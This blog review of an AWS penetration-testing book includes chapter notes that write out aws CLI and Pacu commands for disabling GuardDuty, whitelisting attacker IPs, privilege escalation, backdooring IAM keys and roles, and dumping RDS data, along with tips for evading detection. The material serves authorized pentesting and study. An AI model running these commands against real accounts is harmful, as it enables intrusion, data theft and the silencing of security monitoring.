
Book Review: Hands-On AWS Penetration Testing with Kali Linux

Alright, book done; time for a book review. I think this one merits a review with recommendations for labbing effectively because, while it’s a great book in many ways, there were some huge points of frustration.

Overall Impression

Biggest takeaway – don’t let the issues scare you away. If you want to improve your AWS pentesting skills, this is a valuable read. There are parts that are more general pentesting than AWS pentesting, but I understand including that info for context and to make the book accessible to a wider audience. I really liked the parts that focused on the AWS aspects. It’s worth your time, but you can probably work through the book more efficiently than I did. There were some things that weren’t clear, some errata, and other things that you often see in tech books. I hope that my notes can help people work through the labs with less frustration than I had.

Thoughts on order

I feel like the organization of the book was modified at some point, based on the mismatch between where things are in the GitHub repo and where they fall in the book chapters. The fact that some of the later sections walk through setup in greater detail than earlier sections also supports an order revision late in the writing process. I totally get it – something of this scope is insanely difficult to get to press with everything connected. The AWS documentation is strong enough to get you through the missing pieces, but it would have been helpful to have certain things earlier.

The order as presented was reasonable – it was more that a few pieces had more detail later in the book, which made it look like things got moved. I would have liked the Pacu chapter at the start of using Pacu. I understand the placement – I just would have preferred the info upfront.

Do you need to do X chapter?

If you want to focus on AWS, you can basically skip sections 1 and 2. Those are really focused on setting up Kali and then using traditional pentesting techniques, just targeting an EC2 instance. You can pick and choose the things that interest you and be okay. You don’t “need” to do all of the chapters if you just want to learn more about specific services. I would recommend doing the IAM and logging portions since those do impact the other services, but you can do the book piecewise if you want.

Do you need to keep X for future chapters?

For the most part, the chapters can stand alone, especially if you have familiarity with AWS. Sections 1 and 2 built on each other a bit, but after that everything should be doable with some minimal additional setup. If you have an AWS lab set up already, you should be able to use a fair amount of it for this book. Setting up a VPC is something you will need to do, but it’s not used for everything. The VPC and IAM users/roles are the big things that you need throughout the book. Having a couple of S3 buckets available to make public and exploitable as needed is also helpful, but those are so easy to create that making new ones isn’t a big deal. Honestly, it’s all so easy to spin up that the only thing I would want to keep around is the Kali instance that was set up with Guacamole. I didn’t use it for a lot of the later stuff, but you might want to for the pentesting stuff. Since that involved some setup, even just saving it as an AMI that you can create and terminate as needed would be worth it.

Who would benefit from this book?

I feel like this book was a good match for my pentesting skill level. There were a lot of familiar things that were nice to refresh and lots of new things. I think a beginner to pentesting with a decent tech background would be okay, but there would be a fair amount of frustration. More experienced pentesters who want targeted AWS info can pick and choose what they are looking for. For cloud folks, there’s good info on securing AWS with ideas you can transfer to other platforms. I would not recommend the book for complete beginners (little/no knowledge of networking, security concepts, etc.). But if you’ve got some basic IT experience or are adventurous, go for it.

I noticed a fair amount of frustration from book club members with the initial few chapters. I think it scared some people off from working through the rest of the book because it was taking a lot of time. I know I spent a ton of time trying to get the forensics stuff to work, and when you keep running into roadblocks while following the labs, the ROI drops significantly. I’m not sure how much of that the authors could have eliminated given how quickly cloud moves. There are some things that should have been caught (like how forensics work on EXT4…), and I hit a little more frustration than I have with labs in other books. But not enough to scare me off from other Packt books or to say don’t bother with this particular book.

Costs and how to minimize cost

My costs ran about $10.00 to $15.00 USD each month, and it took me about 6 months to complete. You can definitely work through this more quickly if you are focused. I was doing this on the book club schedule and had my CASP+ exam in there, plus the whole COVID-19 pandemic thing and work and life. Terminating EC2 instances you no longer need and stopping the ones you aren’t actively using are the best ways to minimize your costs. I used micro instances for most things and boosted my Kali instance up to a medium or large when I needed more power. I also used a CIS image for the Win 2008 R2 server, which had some minimal costs. You can opt for free OS options to further keep costs down.

Realistically, after the initial portion, you don’t have to keep any of the EC2 instances running. You can save your Kali instance as an AMI and spin it up as needed; I did very little with the created instances after section 2. Without the EC2 instances, the spend would probably have been less than $5.00 USD per month. I also removed the RDS instance I created once finished because that service can add up. Overall, a very affordable book to work through if you are taking steps to minimize your costs.

Quick list:

  • Costs ran $10.00 – $15.00 USD per month, around $70.00 USD total.
  • By terminating the EC2 instances after section 2, cost could have likely been reduced by half.
  • Shut down EC2 instances when not in use.
  • Use the smallest EC2 instance possible and only increase size when needed.

Parting thoughts

Overall, I really enjoyed working through this book. I had a lot of frustrating moments, but I like figuring stuff out. That led to spending more time troubleshooting than I probably should have, but I consider that a learning experience. I would have liked info as the book moved along about whether things would be needed later, just to help with cost management. I hope the pieces I’ve put down here and throughout the blogs give enough info for others to learn from my experience and keep their costs down even further.

I would definitely encourage others to blog their notes in at least some format (for anything you are working through). I’m finding it a great way to stay accountable as I work through things. And I know I internalize the information better when writing it out for someone else to read. Plus it helps remind you of what you have done and can at least point you in the right direction when you can’t remember exactly what you did.


Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 19 – Putting it All Together – Real-World AWS Pentesting

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 19 – Putting it All Together – Real-World AWS Pentesting

Last chapter – HOORAY! Basically a walkthrough of what a pentest would look like, with tips for doing a good pentest. The walkthrough uses a PersonalUser in an attacker-controlled account with iam:UpdateAssumeRolePolicy and s3:ListBucket permissions and a CompromisedUser in the target account with unspecified permissions.

I’m not going to go in-depth on the how in this blog since previous chapters have covered the exploitation vectors. I’ll be focusing on the process and interesting tidbits provided by the authors. If you’ve gone through the book, all of what’s covered should at least ring a bell.

Make sure to go through a kickoff with the client to cover scope, access, etc. Typical pentest stuff. The scoping part is especially important since AWS won’t scope the way a typical environment would. The authors provide a list of questions to help, including asking about the number of AWS accounts involved, access given, services used, regions, number of instances and other things in use, IAM info, how users access things, etc. Basically, get an idea of the size and composition of the environment you are dealing with.

AWS pentesting rules and guidelines

Really glad to see this section – pentesting cloud services tends to make me nervous because permission isn’t as clear. Make sure you aren’t breaking the AWS rules for pentesting and the AUP. Realistically, if you are going to be pentesting AWS, you should read through both of these and watch for updates. The authors did point out that the activities AWS prohibits don’t cover most of what the book refers to as pentesting, since most of it is using the AWS API to do stuff, which is allowed by the AUP. Potentially some gray area there, but I would expect that a pentesting company would have had legal verify that (meaning that Rhino Security Labs has probably had legal look into it). I’d do my own legal verification though (meaning I would want my company to also verify). Call me paranoid, but I’m not a fan of jail.

Credentials and client expectations

I think we can agree that determining what the client expects is important. And probably making sure that everyone is on the same page so you don’t end up repeating the Coalfire incident that led to arrests and was generally a cluster (through no fault of Coalfire from what I can tell). If the client provides creds, understand what the creds are and if social engineering is allowed. Make sure to find out if you are testing a dev or production environment, anything you shouldn’t touch, and if users are active in the environment. Also find out if there will be a blue team trying to catch you. It’s helpful to provide audit and config checks with the attack narrative, but also keep in mind what the client wants.

Setup

Make sure you have AWS CLI and Pacu ready to go. I’d probably create an AMI so I could have a fresh instance for each test. I’d also have ScoutSuite and the CyberArk tools prepped. Get your AWS keys added, fire up Pacu, and start a new session. If given a set of regions, use set_regions to limit your scope.
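As a rough sketch, the prep might look something like this (profile and region names are placeholders; Pacu prompts you to name a new session the first time you launch it):

 aws configure --profile engagement   # add the keys you were given
 python3 pacu.py                      # create/open a session at the prompt
 import_keys engagement               # pull the keys in from the AWS CLI
 set_regions us-east-1 us-west-2      # limit modules to the in-scope regions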

Unauthenticated reconnaissance

Other than digging around for open S3 buckets, there’s not a lot you can do completely unauthenticated. So this portion is actually talking about using the PersonalUser to do recon. The first command will come from the CompromisedUser though to get the account ID. Basically, use iam__detect_honeytokens to get the account ID, use swap_keys to switch to the PersonalUser, and use iam__enum_users to look for user info. Use a role from the personal account for the --role-name argument since you need it for one of the API calls. Then use iam__enum_roles to get role info. And review the results to see what you’ve found. The authors walk through the findings in their sample environment and explain what the info could mean.
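A sketch of that flow in Pacu (the role name is one from your own account, the account ID comes from the honeytoken check, and module arguments may have changed – check help <module>):

 run iam__detect_honeytokens    # run as CompromisedUser; leaks the target account ID
 swap_keys                      # switch to the PersonalUser keys
 run iam__enum_users --account-id <accountID> --role-name <yourRole>
 run iam__enum_roles --account-id <accountID> --role-name <yourRole>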

The last part of this recon phase uses s3__bucket_finder to look for S3 buckets. Remember to add custom terms to the list used if you have any. The authors note that this module uses the install_dependencies function to pull sub-domain info from Sublist3r and the Buckets.txt file. Interesting aside.

Authenticated reconnaissance plus permissions enumeration

Use swap_keys to pull up the CompromisedUser. Run iam__enum_permissions and then whoami to see what privileges you have. Check out any attached policies. Note that if an ARN is listed, that means it’s an AWS-managed policy. Also look at the list of permissions. While enumerating permissions is important, be aware that it might set off a GuardDuty alert. You can get basic info about permissions for other users and roles with iam__enum_users_roles_policies_groups, but it would be better to use iam__enum_permissions to get more info.
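A sketch of the sequence:

 swap_keys                  # switch back to the CompromisedUser
 run iam__enum_permissions  # enumerate what the active keys can do
 whoami                     # review the permissions Pacu has gathered

To gather the same data for every user and role in the account: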

 run iam__enum_permissions --all-users --all-roles

This stores the info for manual review, or the privilege escalation module can check it for exploitation options. You might also want to run aws__enum_account and aws__enum_spend to get more info. (I might also be using the aws__enum_spend option to keep an eye on costs without logging in to the console, because why not?) The spend info can help you determine what services to target, but it won’t account for anything on the free tier, isn’t live, and some resources don’t have an associated cost.

Since EC2 has a high exploitation potential, running ec2__enum next would be a good idea. Scan all the regions or use set_regions to be more targeted. Check the user data returned for each instance with ec2__download_userdata. One of the really nice features of Pacu is that it will ask if you want to run the module(s) necessary to do what you want to do if you haven’t already. The user data may include command history, passwords, etc. Definitely a worthwhile thing to check. You might find additional targets to attack, but remember: if there is any question about a target being in scope, check with the client.
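A sketch of those enumeration steps:

 run aws__enum_account       # general account info
 run aws__enum_spend         # per-service spend, hints at what's in use
 run ec2__enum               # enumerate instances in the set regions
 run ec2__download_userdata  # check instance user data for secrets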

Privilege escalation

Now that you’ve enumerated things, you can pass the info to iam__privesc_scan to see if any privilege escalation potential exists. The --offline flag tells the module to check all the gathered users and roles without making new API calls. Review the output to see what you can find. Take note of interesting findings, and be sure to report anything vulnerable to the client. You can try the potential vulnerabilities with run iam__privesc_scan. The authors walk through some exploitation options with info about what they would choose and why. Really good info, so be sure to check that out.
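In Pacu terms, a sketch:

 run iam__privesc_scan --offline  # flag privesc paths from the data already gathered
 run iam__privesc_scan            # attempt the escalation methods for the active keys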

Persistence

So with an EC2 spun up, you have some good access, but it’s also something that might stick out and get shut down. Or the associated security groups, etc. could get modified, removing your access. So persistence needs to be established in other ways. Like most pentesting things, the authors recommend multiple persistence methods. Creating new access key pairs was one option (the iam__backdoor_users_keys module we used earlier). Another option was using the lambda__backdoor_new_roles module to backdoor IAM roles as they are created so you can assume them with your PersonalUser account.
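A sketch of setting both up (check each module’s help for current arguments):

 run iam__backdoor_users_keys    # add a second access key pair to target users
 run lambda__backdoor_new_roles  # plant a Lambda that backdoors new roles' trust policies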

Post-exploitation

Now it’s time to poke around and see what other issues you can find in the environment. You’ll want to examine as many services as possible because misconfigurations can occur anywhere.

EC2 exploitation

EC2 is a good place to start. Check public IP addresses. You can use CreateLoginProfile to create login creds or the data EC2 command in Pacu to get details. Check security groups to get an idea of what services are running and potential exploitation options. You might be able to do the same with non-public EC2 instances under the right conditions – if you’ve managed to get full admin access, you probably will. With the right access, you could also just modify security group rules to give yourself access with the AuthorizeSecurityGroupIngress API call or the ec2__backdoor_ec2_sec_groups Pacu module.

There are a couple of options for RCE. The first given was ec2__startup_shell_script – this requires a restart. Nope. Just nope. Maybe if you are desperate and have the go-ahead from the client to knock a server offline for a bit, but generally, nope. systemmanager__rce_ec2 is another option. It basically gives you root access if the right conditions are met.

You could also do some cryptomining if you really want to push the limits. On one hand, I highly doubt this would be an option in the vast majority of pentesting engagements. On the other, I can see a client wanting to test detection capabilities since cryptomining is such a popular thing. Like everything else, have very clear communication with the client and document to what extent you are allowed to disrupt the environment or incur costs. Does this make your pentest a little less realistic? Yes. But breaking things, driving up costs, and otherwise running amok in obvious ways generally are not a great way to get repeat clients. At least not in a production environment.

You might also want to check out EBS volumes. You can snapshot EBS volumes and share them with your account or an EC2 in the compromised account. Sharing with your account has some advantages (like being able to dig in and examine it), but it’s also more likely to be flagged. Or just use ebs__explore_snapshots in Pacu to check things out. It will iterate through the volumes, giving you time to explore each before moving on.
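A quick sketch of two of those options – opening a port to yourself via the CLI and walking EBS snapshots in Pacu (IDs and IP are placeholders):

 aws ec2 authorize-security-group-ingress --group-id <sgID> --protocol tcp --port 22 --cidr <yourIP>/32 --region <region> --profile <profile>
 run ebs__explore_snapshots  # snapshot/attach/cleanup loop for EBS volumes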

Code review and analysis in Lambda

On to Lambda. Start with enumeration using the lambda__enum Pacu module and review using data Lambda. Check each function and look closely at the environment variables for sensitive data – be sure to record/screenshot interesting findings to report. If you find something that might be exploitable, go for it if in scope. You may also want to download the code for review and exploit any interesting findings (again, if in scope).
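A sketch in Pacu:

 run lambda__enum  # enumerate functions, including environment variables
 data Lambda       # review the stored function data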

Getting past authentication in RDS

RDS can be attacked manually or using Pacu. The goal is getting hold of the databases to check the data. You could use a tool like mysqldump to pull the data. Be sure to review the options available for whatever type of database you are dealing with. Using this method keeps you from losing access. If you do this manually, you would need to delete any snapshots you made to avoid running up costs and potentially getting caught (or having a negative impact on the client). Pacu automates this with the rds__explore_snapshots module, which will scan the regions for RDS instances, ask if you want to copy each one, and then clean up when done. Really handy. And this module uses the ModifyDBInstance API call, which does a bunch of stuff at once, so the master password change won’t stand out.
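If it’s a MySQL-backed instance, pulling the data from your restored copy might look like this (endpoint and creds are placeholders):

 mysqldump -h <rdsEndpoint> -u <masterUser> -p --all-databases > rds-dump.sql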

The authenticated side of S3

Lots of info available on finding public S3 buckets. For a pentest when you have creds, you can look at things a little differently. Note who has access to what and what information is in those buckets. Review files found strategically to make best use of your time. Consider filenames and extensions as hints to value. Check for creds, API keys, etc. The authors recommend alerting the client to any public resources since those can go from not a problem to problematic with a single file put in the wrong place. The authors also note that the bucket doesn’t have to be publicly listable even if the files need to be public. Check for any automation and use bucket and filenames to assist with recon.

Auditing for compliance and best practices

Providing audit info in addition to the pentest info is helpful. Stuff like public access, encryption, logging, backups, MFA, password policies, etc. The authors recommend using tools to help with this info. They mention Prowler and Security Monkey in addition to ScoutSuite. Prowler is an AWS CIS benchmark tool that looks interesting. Something to test out at least and see how you like the output. Security Monkey monitors AWS and GCP accounts, but it unfortunately hit end of life in 2020. Security Monkey refers you to AWS Config and GCP Cloud Asset Inventory as alternatives. New tools are coming out all the time, so if this is something you need to use, keep an eye on things.
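I haven’t run Prowler yet, but going by its README, a basic CIS benchmark run looks something like this (repo location and flags as of this writing – verify before use):

 git clone https://github.com/toniblyx/prowler
 cd prowler
 ./prowler -p <profile> -r <region>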

Summary

AWS pentesting is a major undertaking. Like many things in cybersecurity, it’s going to be a never-ending learning process. The authors note it’s hard to be done with an AWS pentest because the environment can be massive and complicated, so do what you can within the timeline. I think this also makes it critical to clearly define scope and be realistic about what you can do within the confines defined. Like most things, people will set up their AWS environments differently, so you’ll have to get the lay of the land for each engagement.

So end of the road for this book. Really good book with some pain points that I’ll cover in the book review post.


Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 18 – Using Pacu for AWS Pentesting


Ch 18 – Using Pacu for AWS Pentesting

So now to cover Pacu in more depth. I don’t really agree with the choice to put this chapter this far toward the end – it seems like it would have been a natural fit earlier. Pacu is from Rhino Security Labs and written in Python 3, which we covered previously. Basically it serves as a way to put all the research done on exploiting AWS into one place. It really is a cool project that has a ton of value.

The authors go over the installation process again and explain some of the pieces. They go more in depth about sessions (basically a way to keep engagements isolated) and explain how sessions help limit API calls. AWS keys are needed for most of Pacu’s functionality.

Pacu commands are also explored in depth…review the chapter or check out the GitHub. I’m going to keep this very brief:

  • list/ls – lists the modules and categories.
  • search – um, searches.
  • help – does what you expect.
  • whoami – outputs info about the active keys. The amount of data available varies with how much has been enumerated; iam__enum_permissions will help fill it out.
  • data – gives the data stored for the session.
  • services – provides info about the AWS services that have data stored.
  • regions – gives region info.
  • update_regions – shouldn’t be needed but can be used to update the region list.
  • set_regions – important to help limit API calls; it controls which regions the commands run in.
  • run/exec – does the thing.
  • set_keys – used to add keys.
  • swap_keys – lets you use a different set of keys.
  • import_keys – pulls keys from the AWS CLI.
  • exit/quit/CTRL+C – all quit.
  • aws – runs AWS CLI commands from inside Pacu.

The proxy command was interesting because it lets you work with the built-in command and control structure PacuProxy. Basically gives you a way to avoid detection by shuttling through a compromised instance. More on this later.

Creating a new module

There’s a template for creating new modules that basically spells out what you need to do. To create your own modules, a better understanding of the API is helpful. So the covered API methods…

The get_active_session API defines the session variable. You can copy and modify session data, but the authors recommend only updating session data at the end to prevent database issues.

The get_proxy_settings (pacu_main.get_proxy_settings) pulls info about PacuProxy. It wouldn’t be likely to get used unless you are working with a module using PacuProxy.

The print and input methods override the native Python print and input methods so you can customize how things are printed. A cool feature is if the print command is outputting a dictionary, it will check for any SecretAccessKey in the dictionary and redact it to keep the key secure.

The key_info method gets info about the active set of AWS keys. Definitely a handy feature.

The fetch_data method facilitates purpose-built modules by running the modules needed to enumerate missing data. Basically, if you are trying to do something that needs another module’s output, this will run that module to grab the data if it isn’t there.

The get_regions method lets the module check the region info for the session and run accordingly as well as considering what regions the service is available in on AWS. This is a good option to limit API calls and takes regions off the list of things for module developers to deal with.

The authors start off the install_dependencies section by saying it’s basically deprecated, but it can be helpful if you need to pull dependencies. It will likely be completely removed soon, so check if you are developing a module.

The get_boto3_client and get_boto3_resource methods take care of the configuration options needed to interact with the boto3 library. Basically they make the module developer’s life easier.

Module structure and implementation

The provided template module basically spells out the module structure. The authors walk through developing a module using one of the S3 scripts developed earlier. The module code is available on the book GitHub. The integration into Pacu is pretty straightforward: create a new folder with the desired name in the modules folder, save the module script as main.py in that folder, create an empty __init__.py file in the folder, and run Pacu.
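As a quick sketch of that integration, from the Pacu directory (module name made up for illustration):

 mkdir modules/my_s3_module
 cp my_s3_script.py modules/my_s3_module/main.py  # your module code saved as main.py
 touch modules/my_s3_module/__init__.py
 python3 pacu.py                                  # the new module should show up in ls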

PacuProxy

Note: Unfortunately this module has been removed – that’s a bummer since it looked really cool. I’m leaving this in place in case it comes back at some point.

The chapter wraps with a quick intro to PacuProxy. Basically it’s a C2 framework for the cloud that is part of the Pacu workflow. Very nice. It has its own modules that can be used. Probably the biggest takeaway is that PacuProxy lets you proxy through resources you have compromised to help avoid detection. I can see a lot of benefits to using the PacuProxy option once you’ve gotten yourself into an environment. I think if you are going to focus on pentesting AWS, going through the details of PacuProxy would be a very good use of time. The authors do say it’s still in development, so they have provided limited details.

Summary

I still think this chapter would have been better situated earlier in the book. That’s not to say I don’t understand it being here – just that the info would have been helpful earlier on. It’s a really great tool that anyone responsible for the security of an AWS environment would benefit from becoming familiar with. Between Pacu, Scout Suite, and the CyberArk tools SkyArk (which can scan Azure and AWS to look for privileged users) and SkyWrapper (which helps find abuse of temporary tokens), there are a growing number of tools available for those working with cloud environments. The cost can limit the ability to lab things out fully (my AWS costs have been running about $10.00 USD per month), but that cost may be more affordable than building out a physical lab. I’m looking forward to doing a lot of this in Azure, but I will admit I have concerns about costs in that environment. I’ve found the cost explanations and breakdowns from AWS to be very clear, but I’ve not found that to be the case with Azure. I plan on pursuing the Developer Subscription when I start building out my own Azure environment. I’ve done a ton of Azure labs through Cybrary and find the environment very easy to work in, but I’m looking forward to getting my own environment spun up in the future.


Hands-On AWS Penetration Testing with Kali Linux Section 7: Leveraging AWS Pentesting Tools for Real-World Attacks – Ch 17 – Using Scout Suite for AWS Security Auditing


Ch 17 – Using Scout Suite for AWS Security Auditing

Next up is using Scout Suite to do an audit of the AWS infrastructure. Nice helpful tool with a dashboard report. The book walks through setting up a VPC with an exposed EC2 instance and S3 bucket. I don’t feel a real need to go through that setup, and if you’ve been working through things, you should be able to just use the VPC you’ve already set up. If you have an EC2 in there, you can make it vulnerable. Remember to add the Internet gateway if you create a new VPC.

The vulnerable part of the EC2 is a security group that allows All traffic from Anywhere. I added the group and a new EC2 in my existing VPC. Amazon helpfully told me that the security group assigned to the new EC2 was “open to the world” and that I should update it. Good call, Amazon.

The vulnerable S3 bucket requires turning off the block all public access option, then going to the Access Control List and allowing public read/write access. I think AWS has increased the warnings about making S3 buckets public even more since the last time I created a bucket, which I see as a good thing.

Configuring and running Scout Suite

Scout Suite works on AWS, Azure, and Google Cloud Platform – that is sweet. Setup starts by adding an IAM user with the appropriate permissions: IAM > Add user > Programmatic Access > Attach existing policies directly > Select ReadOnlyAccess and SecurityAudit (use the search feature to save time) > Review and create. Note the access key ID and secret access key to use for AWS CLI configuration. Configure the CLI with:

 aws configure --profile <auditorprofile>

You can skip the --profile if it’s the only one. Now install Scout Suite. I’m using GitHub because the pip3 version had issues, and I didn’t feel like dealing with it.

 git clone https://github.com/nccgroup/ScoutSuite
 cd ScoutSuite
 sudo pip3 install -r requirements.txt
 python3 scout.py --help #Check install
 python3 scout.py aws --profile <profile>

Note that the script is scout.py, not Scout.py as in the book, and you may need to specify the profile depending on how you have the AWS CLI set up. This will give you an HTML report that you can view in the normal ways. It returned a fair number of things, but nothing too surprising. It gives a really nice summary. I can definitely see using Scout Suite for an overview of cloud infrastructure, much like using PingCastle to check on-prem AD.

Using Scout Suite’s rules

Scout Suite very helpfully allows custom rulesets. Pull down the default ruleset to make sure you have the right format.

 curl https://raw.githubusercontent.com/nccgroup/ScoutSuite/master/ScoutSuite/providers/aws/rules/rulesets/detailed.json > detailed-rules.json

The line count has changed since the book was written, so definitely use whatever feature your text editor has to search or jump to the rule you want to modify (1200ish on the version I pulled).
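For reference, ruleset entries look something like this – the rule name here is just an example; find the one you want to promote and raise its level:

 "ec2-security-group-opens-all-ports.json": [
     {
         "enabled": true,
         "level": "danger"
     }
 ],

Now run with the new ruleset: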

 python3 scout.py aws --profile <profile> --ruleset <ruleset>

Now the VPC thing should pop as a higher level of warning.

Summary

Very cool tool. Nice quick chapter. I look forward to using Scout Suite to investigate Azure settings and looking into it more for AWS. If nothing else, it’s a really nice way to make sure you’ve turned off the vulnerable things you’ve created for labbing.


Hands-On AWS Penetration Testing with Kali Linux Section 6: Attacking AWS Logging and Security Services – Ch 16 – GuardDuty


I decided to keep posting by chapter since that worked well for me in the last section. GuardDuty is the AWS security monitoring service. Remember that depending on your setup, you may not have to specify region and profile in the CLI commands. And make sure your user has the required permissions so you can check things out in the CLI.

Ch 16 – GuardDuty

Per the authors, pentesting basics: understanding the monitoring being done is important to inform your attack plan. If you find GuardDuty is not enabled, that doesn’t mean there is no monitoring going on, because there are other options available. But GuardDuty is cheap and built in, which makes it an attractive option when an org is getting started with AWS or is looking to control costs.

Side note…

Thus the recon step that pentesting generally starts with. Depending on the situation, you may have some of this information provided by your client. You might also be able to use OSINT to get an idea of what the target is using. Job postings and LinkedIn would be some of the first places I’d look for this. The book just kind of jumps into GuardDuty, so I wanted to think a bit about how you can get this information when you are dealing with more of a blackbox situation. I’m hoping this chapter will cover something you can do in AWS to determine what settings are enabled. Part of pentesting can be gradually getting noisier until you get caught to get an idea of what’s in place. Depends on the situation.

Back to the book.

GuardDuty pulls info from VPC flow logs, CloudTrail event logs, and DNS logs (if the requests go through AWS DNS resolvers). You can’t review the DNS logs in AWS, which seems like something that will be addressed at some point. And GuardDuty can use VPC flow logs and CloudTrail logs even if you haven’t enabled them. I find all of that very interesting for some reason. Not enabled, but still accessible. And not accessible otherwise, but still available to GuardDuty. Just strikes me as odd. Cross-account management is also available for GuardDuty. If you can get ahold of the GuardDuty master account, you can mess with GuardDuty for all of the associated accounts.

Basically, GuardDuty functions as an IDS. Alerts can be set up to send notifications using CloudWatch Events. GuardDuty uses machine learning to do user behavior analytics and alert on abnormal behaviors. There are settings to pop on basic attacks like port scanning EC2 instances, brute-force attacks on RDP or SSH, and Tor being used to communicate with AWS. None of those are behaviors that should be the norm for an AWS environment. Since GuardDuty does use machine learning, test environments that constantly exhibit behavior that would be problematic in a prod environment may not alert as expected, because dumpster fires are expected there.

Alerting about/reacting to GuardDuty findings

GuardDuty shows findings in the web console – which is great, but not something you want to have open all the time. So CloudWatch Events can be used to trigger notifications. The authors talk about using the rules to trigger Lambda functions. You could then use the Lambda functions to react to the data and set up some automation in responding to the alerts. The book example was parsing the data in the alert and then blocking outbound access to a known malicious domain. I suppose this functionality could be used to push GuardDuty into IPS territory. Definitely interesting – I’m going to have to do some digging to see if there are published Lambda functions to serve as rules like you have for Snort, Zeek, etc. A quick search makes it look like there are some things available. Something to dig into if you are a heavy AWS shop.

Bypassing GuardDuty

GuardDuty can trigger on a lot of things, so there are also a variety of ways to bypass it. You could also essentially gaslight defenders by triggering alerts that send them in the wrong direction. The first option is basically turning off GuardDuty. List the detectors with:

 aws guardduty list-detectors --region <region> --profile <profile>

You can disable the detector found with:

 aws guardduty update-detector --detector-id <detectorID> --no-enable --region <region> --profile <profile>

Alternatively it can be deleted with:

 aws guardduty delete-detector --detector-id <detectorID> --region <region> --profile <profile>

That would certainly prevent us from being caught via a GuardDuty alert. Though the whole GuardDuty not being there might be a bit of a red flag if someone was paying attention. Good option to have, but probably one to use at the end of a pentest when you are trying to make noise and get caught.

Bypassing everything with IP whitelisting

A better option is getting your IP added as a trusted IP. It’s under GuardDuty > Settings > Lists in the AWS console. You can also specify threat IPs. There is a max of one trusted IP list per region, so that could be problematic. Check for an existing trusted IP list with:

 aws guardduty list-ip-sets --detector-id <detectorID> --region <region> --profile <profile>

You can add IPs by creating a text file and putting it in an S3 bucket that is publicly accessible. It looks like at this time you have a fair number of options for naming the text file. I’ll go with ip-trusted.txt. Upload it with:

 aws s3 cp ./ip-trusted.txt s3://<bucket> --region <region> --profile <profile>

Then make it publicly readable so GuardDuty can read it:

 aws s3api put-object-acl --acl public-read --bucket <bucket> --key ip-trusted.txt --region <region> --profile <profile>

Just make sure the bucket is set up to allow public read. Now you can access the file via URL and use it to create a trusted IP list:

 aws guardduty create-ip-set --detector-id <detectorID> --format TXT --location <URL> --name Trusted --activate

Pacu can automate this:

 run guardduty__whitelist_ip --path <URL>

The book goes on to explain that when Pacu runs ListIPSets and trusted IPs are already present, it will give you the option to delete the existing IP set and replace it with your own. This could cause issues, so be cautious with that option. You could alternatively update the list to include your IP. To amend the list, first get the IP set:

 aws guardduty get-ip-set --detector-id <detectorID> --ip-set-id <ipsetID> --region <region> --profile <profile>

Then you can download the list, modify it, and re-upload it as we did earlier – a quick sketch of that loop below.
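(Assuming curl and the same bucket from before; the Location field of get-ip-set gives you the URL.)

 curl <existingListURL> -o ip-trusted.txt  # grab the current trusted list
 echo "<yourIP>" >> ip-trusted.txt         # add your IP
 aws s3 cp ./ip-trusted.txt s3://<bucket> --region <region> --profile <profile>

Then update the IP set: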

 aws guardduty update-ip-set --detector-id <detectorID> --ip-set-id <ipsetID> --location <URL> --activate --region <region> --profile <profile>

Be sure to hang on to the original IP set URL so you can change the configuration back when done. The authors also point out that if GuardDuty is set up with cross-account access and another account is the primary account, you can’t modify the trusted IP settings.

Bypassing EC2 instance credential exfiltration alerts

It sounds like creds pulled from an EC2 instance will trigger an alert if they are used from an external IP. The most common way to get such creds is SSRF (server-side request forgery) against an EC2 instance with an attached IAM instance profile. The authors say this is a common finding and easy to bypass. Since it triggers on external IPs, you can just use an EC2 instance in the same region to avoid the trigger.

You can start the EC2 from the CLI:

 aws ec2 run-instances --region <region> --image-id <imageID> --instance-type <type> --key-name <ec2SSHkeyname> --count 1 --user-data file://userdata.txt

The userdata file will contain the install scripts for Python, pip3, Git, AWS CLI, and Pacu:

 #!/bin/bash
 # Install Python 3, pip, and Git
 apt-get update
 apt-get install python3 python3-pip git -y
 # Install the AWS CLI
 pip3 install awscli
 # Pull down and install Pacu
 cd /root
 git clone https://github.com/RhinoSecurityLabs/pacu.git
 cd pacu/
 /bin/bash install.sh

Once launched, SSH in and run:

 sudo su
 cd /root/pacu
 python3 pacu.py
 set_keys

And then operate as normal. This GuardDuty alert only triggers for creds from EC2 instances in the monitored account, so if the creds are for a server hosted by another service, you won’t trigger this type of alert. This also doesn’t track Glue, which is an ETL (extract, transform, and load) service. That was an interesting aside…add Glue to the long list of AWS services to look into.

Bypassing operating system (PenTest) alerts

AWS also has a feature where it can alert on common pentest distros – Kali, Parrot, and Pentoo. Easy to bypass, but a cool feature. Basically, just change your user agent. Pacu will automatically change the user agent, but a script is also provided that would update the user agent.

Other simple bypasses

Since GuardDuty watches for low-hanging fruit, there are some ways to avoid it: don’t use Tor, don’t port scan from/to EC2 instances, don’t brute-force SSH/RDP, and don’t interact with known-bad hosts. Those seem kind of obvious.

Cryptocurrency

Don’t set up cryptomining as part of a pentest (that’s good advice – for real, don’t do that). There are alerts for this, but you can avoid them by staying away from connections to known cryptocurrency-related domains/IPs.

Behavior

GuardDuty can also alert on unusual port activity. So sticking to HTTP and HTTPS will help avoid that. And you can avoid the alerts on large data exfil by using a trickle approach over a longer period of time.

Resource Consumption

This triggers on launching resources into the account. Avoid this by avoiding regions with GuardDuty enabled. If GuardDuty is enabled in all regions, bypass by avoiding the monitored API calls or using a different service like Lightsail, Glue, or AppStream.

Stealth

GuardDuty also alerts if you make a password policy weaker. Avoid that by not messing with password requirements.

Trojan

GuardDuty also alerts on comms with known-bad IPs/domains. So don’t use those. It will also trigger on DNS data exfiltration, though you can avoid that if the DNS service is not using AWS resolvers.

Others

There are other things you can do. The authors say they are more difficult, specific, etc. so are not covered.

Summary

Slower start with a rapid-fire end. Interesting service that will be fun to watch mature. Remember that other things might be watching too, so don’t count on bypassing GuardDuty being sufficient to avoid detection. But you should still bypass it so you’ve covered the easily checked things that are built in to AWS.